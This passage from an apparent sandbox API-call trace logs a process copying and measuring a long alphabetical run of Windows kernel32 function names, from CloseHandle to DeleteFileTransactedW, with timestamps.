lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0179.070] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0179.070] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0179.070] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0179.070] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0179.070] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0179.070] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0179.070] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0179.070] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0179.070] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0179.070] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0179.070] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0179.070] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0179.070] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0179.070] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0179.071] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0179.071] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0179.071] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0179.071] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0179.071] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0179.071] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0179.071] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0179.071] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0179.071] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0179.071] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0179.071] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0179.071] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0179.071] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0179.071] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0179.071] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0179.071] lstrlenA (lpString="COPYCONTEXT") returned 11 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0179.071] lstrlenA (lpString="COPYFILEA") returned 9 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0179.071] lstrlenA (lpString="COPYFILEEXA") returned 11 [0179.071] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0179.071] lstrlenA (lpString="COPYFILEEXW") returned 11 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0179.072] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0179.072] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0179.072] lstrlenA (lpString="COPYFILEW") returned 9 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0179.072] lstrlenA (lpString="COPYLZFILE") returned 10 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0179.072] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0179.072] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0179.072] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0179.072] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0179.072] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0179.072] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0179.072] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0179.072] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0179.072] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0179.072] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0179.072] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0179.072] lstrlenA (lpString="CREATEEVENTA") returned 12 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0179.072] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0179.072] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0179.072] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0179.073] lstrlenA (lpString="CREATEEVENTW") returned 12 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0179.073] lstrlenA (lpString="CREATEFIBER") returned 11 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0179.073] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0179.073] lstrlenA (lpString="CREATEFILEA") returned 11 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0179.073] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0179.073] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0179.073] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0179.073] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0179.073] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0179.073] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0179.073] lstrlenA (lpString="CREATEFILEW") returned 11 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0179.073] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0179.073] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0179.073] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0179.073] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0179.073] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0179.073] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0179.073] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0179.073] lstrlenA (lpString="CREATEJOBSET") returned 12 [0179.073] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0179.074] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0179.074] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0179.074] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0179.074] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0179.074] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0179.074] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0179.074] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0179.074] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0179.074] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0179.074] lstrlenA (lpString="CREATEPIPE") returned 10 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0179.074] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0179.074] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0179.074] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0179.074] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0179.074] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0179.074] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0179.074] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0179.074] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0179.074] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0179.074] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0179.075] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0179.075] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0179.075] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0179.075] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0179.075] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0179.075] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0179.075] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0179.075] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0179.075] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0179.075] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0179.075] lstrlenA (lpString="CREATETHREAD") returned 12 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0179.075] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0179.075] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0179.075] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0179.075] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0179.075] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0179.075] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0179.075] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0179.075] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0179.075] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0179.076] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0179.076] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0179.076] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0179.076] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0179.076] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0179.076] lstrlenA (lpString="CTRLROUTINE") returned 11 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0179.076] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0179.076] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0179.076] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0179.076] lstrlenA (lpString="DEBUGBREAK") returned 10 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0179.076] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0179.076] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0179.076] lstrlenA (lpString="DECODEPOINTER") returned 13 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0179.076] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0179.076] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0179.076] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0179.076] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0179.076] lstrlenA (lpString="DELETEATOM") returned 10 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0179.076] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0179.076] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0179.077] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0179.077] lstrlenA (lpString="DELETEFIBER") returned 11 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0179.077] lstrlenA (lpString="DELETEFILEA") returned 11 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0179.077] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0179.077] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0179.077] lstrlenA 